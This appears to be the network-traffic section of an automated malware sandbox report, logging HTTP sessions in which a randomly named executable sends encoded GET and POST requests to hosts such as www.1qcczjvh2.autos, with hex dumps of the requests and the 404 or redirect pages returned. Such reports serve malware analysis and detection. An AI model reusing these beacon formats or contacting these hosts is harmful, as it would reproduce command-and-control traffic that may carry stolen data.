                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 45 46 79 59 6c 59 45 56 4d 55 73 32 6d 6c 2f 72 4b 53 6c 43 6f 7a 68 57 6f 51 50 63 58 6c 55 59 58 41 67 44 76 5a 77 47 31 58 71 69 37 56 35 51 57 36 56 66 4e 64 71 51 4b 78 34 4c 67 42 5a 6f 71 41 5a 79 6c 50 52 49 59 64 6e 74 75 6c 67 64 58 6d 38 6a 38 6e 76 57 2f 57 68 47 4e 6c 49 2b 59 59 37 41 79 4f 67 79 42 57 73 75 6c 6d 62 5a 39 2b 65 78 79 61 63 4d 56 47 79 69 53 4d 33 37 56 42 73 2b 57 75 2b 56 46 68 70 54 36 79 71 2b 51 68 41 65 75 59 41 46 4f 45 57 4f 56 59 4d 41 6c 6c 5a 68 45 51 63 32 6f 34 46 49 77 6f 79 34 58 6a 66 49 4d 2b 69 49 62 51 59 38 64 52 57 61 36 49 57 35 79 53 66 66 64 67 70 50 6f 6a 75 52 75 73 30 4d 54 4a 35 6a 5a 5a 51 78 47 63 61 39 41 51 53 78 69 65 4b 64 69 4d 75 6b 75 51 53 72 42 47 44 66 41 6a 41 61 74 41 72 33 71 78 6d 43 4c 54 35 4a 69 49 52 77 45 6d 2b 78 77 43 2b 34 56 76 38 66 6c 70 70 43 64 56 5a 65 33 35 75 52 [TRUNCATED]
                                                                                                            Data Ascii: yhXxt4VH=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXEFyYlYEVMUs2ml/rKSlCozhWoQPcXlUYXAgDvZwG1Xqi7V5QW6VfNdqQKx4LgBZoqAZylPRIYdntulgdXm8j8nvW/WhGNlI+YY7AyOgyBWsulmbZ9+exyacMVGyiSM37VBs+Wu+VFhpT6yq+QhAeuYAFOEWOVYMAllZhEQc2o4FIwoy4XjfIM+iIbQY8dRWa6IW5ySffdgpPojuRus0MTJ5jZZQxGca9AQSxieKdiMukuQSrBGDfAjAatAr3qxmCLT5JiIRwEm+xwC+4Vv8flppCdVZe35uRJHpYxnlyxe4MEJ6IGeoRVwnnbkkoPPZVeM24KvGqm7PCMhe3cXqqSbAJt/P0W65ayPlpzGI9TpfRGE23duxNT6EaLZ2E6lkHLr8qDbmDu7Oe5rW3lf4eTy22EOMZiXZxxFc+vAuBhxW9x3IUD4+jo5+kAIezNMG7g2//sf/NI1NibihnJjYPFR0j9KC11oz6EBzBVoNRHSWcDzqxxOfXJ0R5YlmuGF5pGjycH95h5v854W9TsiD53VmCT3H9QavNcIR7hdiMOwi8Q5rbpUv6cueAHj59m1KUD4w6grQTCkZFNxFiBsYjBng0WjOgcFeMv6ZLcAWYWA3nycDfVM+LlcMXw78Wz5b3VIsbNY+6sJRIlZLzPfJhfs7yWR0D3dzvcHuEBClRtgpGQnUItbYicMvHyg/A0WHucBAwI60bggj5pJxBNj+20Q/e2T7ojXVssZcqCnMR4zq2PYI63TduZWMyI5xwlSqSNs3pgShVT3OlwqhiMGst4vVYBFEoX8tBk8nqacOYWt+NT84Z/nLjn6AnuPoWrnnRk4HuaJijEqTzz7TwfHjlgI+Q+LtTscrkIdVe/yFi8z/RUN6E0ULwsILoxzGQ/gIX+qp82xGPqv3DAepz3sgzuEgBOKzdpElglt92TSQeJZrz2Yyzb+OwljPRxHYRy838nV [TRUNCATED]
                                                                                                            Dec 6, 2024 09:33:57.024739981 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.4499673.33.130.190805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:58.593664885 CET409OUTGET /rbqc/?yhXxt4VH=3OhzIPQDpE/WyOq4c54Fyv33ZIsYjpJwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rliaUrIlqLG+JAYIZgOxd79aoCwxPUFZEjsrU=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.iglpg.online
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:33:59.682074070 CET382INHTTP/1.1 200 OK
                                                                                                            content-type: text/html
                                                                                                            date: Fri, 06 Dec 2024 08:33:59 GMT
                                                                                                            content-length: 261
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 68 58 78 74 34 56 48 3d 33 4f 68 7a 49 50 51 44 70 45 2f 57 79 4f 71 34 63 35 34 46 79 76 33 33 5a 49 73 59 6a 70 4a 77 46 48 43 38 56 68 47 67 59 57 6c 42 4e 43 51 4d 52 62 41 30 34 6c 59 58 68 63 69 62 4f 64 47 61 61 59 51 55 45 33 68 2f 64 58 4d 38 49 37 56 47 4e 33 72 6c 69 61 55 72 49 6c 71 4c 47 2b 4a 41 59 49 5a 67 4f 78 64 37 39 61 6f 43 77 78 50 55 46 5a 45 6a 73 72 55 3d 26 37 6a 3d 79 66 65 50 31 38 52 68 70 68 4c 68 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yhXxt4VH=3OhzIPQDpE/WyOq4c54Fyv33ZIsYjpJwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rliaUrIlqLG+JAYIZgOxd79aoCwxPUFZEjsrU=&7j=yfeP18RhphLhR"}</script></head></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.449983129.226.153.85805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:34:05.413283110 CET682OUTPOST /pfw9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.1qcczjvh2.autos
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.1qcczjvh2.autos
                                                                                                            Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 45 78 6f 6e 6a 4a 45 4f 37 62 54 49 76 67 72 6f 38 49 73 4a 6f 70 65 63 65 6c 39 4c 59 6c 4c 79 77 63 59 42 2f 69 4f 47 71 43 34 4e 50 6b 44 4f 2b 59 66 68 7a 73 38 33 4f 35 42 4c 53 62 49 49 4a 71 78 39 4b 5a 4b 47 4e 32 31 79 45 32 31 41 51 35 72 6a 66 75 55 63 47 46 52 51 47 68 68 32 4a 56 39 77 5a 2b 4f 52 32 49 6b 65 71 68 49 7a 47 67 32 30 6f 47 56 73 76 48 56 52 42 42 49 42 6a 69 56 4a 57 52 55 71 37 79 33 48 58 30 6c 49 58 42 6f 49 4b 38 32 64 30 6c 78 4b 38 48 34 6b 61 4c 61 44 2f 30 74 69 61 4f 34 61 57 4b 2b 5a 6f 6b 46 4a 4b 51 3d 3d
                                                                                                            Data Ascii: yhXxt4VH=17NZVBLvh1g4ExonjJEO7bTIvgro8IsJopecel9LYlLywcYB/iOGqC4NPkDO+Yfhzs83O5BLSbIIJqx9KZKGN21yE21AQ5rjfuUcGFRQGhh2JV9wZ+OR2IkeqhIzGg20oGVsvHVRBBIBjiVJWRUq7y3HX0lIXBoIK82d0lxK8H4kaLaD/0tiaO4aWK+ZokFJKQ==
                                                                                                            Dec 6, 2024 09:34:06.936852932 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: Tengine
                                                                                                            Date: Fri, 06 Dec 2024 08:34:06 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Content-Length: 58288
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: "67344967-e3b0"
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                            Dec 6, 2024 09:34:06.936871052 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                                                                            Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                                                                            Dec 6, 2024 09:34:06.936882973 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                                                                            Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                                                                            Dec 6, 2024 09:34:06.936980963 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                                                                                                            Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                                                                                                            Dec 6, 2024 09:34:06.936994076 CET1236INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                                                                                                            Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                                                                                                            Dec 6, 2024 09:34:06.937009096 CET1236INData Raw: 45 47 48 76 61 58 36 4d 74 67 61 79 63 62 51 6a 77 66 61 48 49 68 69 54 70 36 6a 73 64 47 32 68 45 53 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c
                                                                                                            Data Ascii: EGHvaX6MtgaycbQjwfaHIhiTp6jsdG2hESapg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl
                                                                                                            Dec 6, 2024 09:34:06.937024117 CET1236INData Raw: 30 6b 74 69 74 4f 31 6e 5a 52 55 34 31 41 6e 79 30 6f 36 68 39 78 61 72 51 71 76 56 32 75 6a 4f 43 52 63 55 2b 4d 53 58 75 2b 34 56 45 33 67 66 77 49 65 77 49 38 42 46 42 65 7a 55 70 59 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a
                                                                                                            Data Ascii: 0ktitO1nZRU41Any0o6h9xarQqvV2ujOCRcU+MSXu+4VE3gfwIewI8BFBezUpYzlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+
                                                                                                            Dec 6, 2024 09:34:06.937184095 CET1236INData Raw: 36 52 76 59 75 2b 41 65 52 44 4e 67 75 7a 63 55 59 2f 4f 4a 76 2f 64 45 52 5a 32 35 75 42 41 72 6b 6d 6c 6e 45 61 36 66 47 39 46 53 4c 44 41 55 6c 66 4b 2b 39 58 72 66 50 44 41 78 70 4d 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e
                                                                                                            Data Ascii: 6RvYu+AeRDNguzcUY/OJv/dERZ25uBArkmlnEa6fG9FSLDAUlfK+9XrfPDAxpMQpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllD
                                                                                                            Dec 6, 2024 09:34:06.937196970 CET1169INData Raw: 30 65 69 6d 74 39 35 73 45 63 6d 51 4c 75 43 53 41 4b 5a 43 6e 69 76 30 4e 52 6e 76 68 53 49 38 62 64 67 35 32 67 67 59 4a 51 49 6f 70 74 79 30 34 64 68 4a 67 63 6a 49 75 59 36 6e 59 66 66 31 79 75 6b 6e 38 4d 78 6a 55 56 36 50 36 58 39 32 67 49
                                                                                                            Data Ascii: 0eimt95sEcmQLuCSAKZCniv0NRnvhSI8bdg52ggYJQIopty04dhJgcjIuY6nYff1yukn8MxjUV6P6X92gIefgo4uyc9MtLCp2d3F7/l+jX0jkFcghM3ZhjNX47ljMAjZ37yyIUgw4rs2E3Ue8tCr+AAGoEei3FcQ9i3xxR0WQC7CTxe27qzEY9S9BwHYAXwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5T
                                                                                                            Dec 6, 2024 09:34:06.937273979 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                                                                                                            Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.449989129.226.153.85805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:34:08.083704948 CET702OUTPOST /pfw9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.1qcczjvh2.autos
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.1qcczjvh2.autos
                                                                                                            Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 76 79 33 35 6b 42 2b 67 6d 47 35 79 34 4e 42 45 44 50 78 34 65 76 7a 73 77 56 4f 38 35 4c 53 62 73 49 4a 76 56 39 4b 71 69 4a 4d 6d 31 4b 63 47 31 43 64 5a 72 6a 66 75 55 63 47 46 46 32 47 68 35 32 4a 6c 4e 77 5a 63 6d 65 37 6f 6b 5a 39 52 49 7a 43 67 32 77 6f 47 56 65 76 47 59 2b 42 44 41 42 6a 67 64 4a 58 45 67 70 78 79 32 43 61 55 6b 39 59 42 45 45 46 2b 72 75 72 47 49 73 35 32 55 6c 53 74 58 5a 75 46 4d 31 49 4f 63 70 4c 4e 33 74 6c 6e 34 41 52 56 33 42 34 47 78 62 2b 37 41 5a 2b 58 74 72 4e 41 6f 6c 4b 4a 45 3d
                                                                                                            Data Ascii: yhXxt4VH=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXvy35kB+gmG5y4NBEDPx4evzswVO85LSbsIJvV9KqiJMm1KcG1CdZrjfuUcGFF2Gh52JlNwZcme7okZ9RIzCg2woGVevGY+BDABjgdJXEgpxy2CaUk9YBEEF+rurGIs52UlStXZuFM1IOcpLN3tln4ARV3B4Gxb+7AZ+XtrNAolKJE=
                                                                                                            Dec 6, 2024 09:34:09.608288050 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: Tengine
                                                                                                            Date: Fri, 06 Dec 2024 08:34:09 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Content-Length: 58288
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: "67344967-e3b0"
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                            Dec 6, 2024 09:34:09.608318090 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                                                                            Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                                                                            Dec 6, 2024 09:34:09.608330965 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                                                                            Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                                                                            Dec 6, 2024 09:34:09.608472109 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                                                                                                            Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                                                                                                            Dec 6, 2024 09:34:09.608484983 CET1236INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                                                                                                            Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                                                                                                            Dec 6, 2024 09:34:09.608495951 CET1236INData Raw: 45 47 48 76 61 58 36 4d 74 67 61 79 63 62 51 6a 77 66 61 48 49 68 69 54 70 36 6a 73 64 47 32 68 45 53 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c
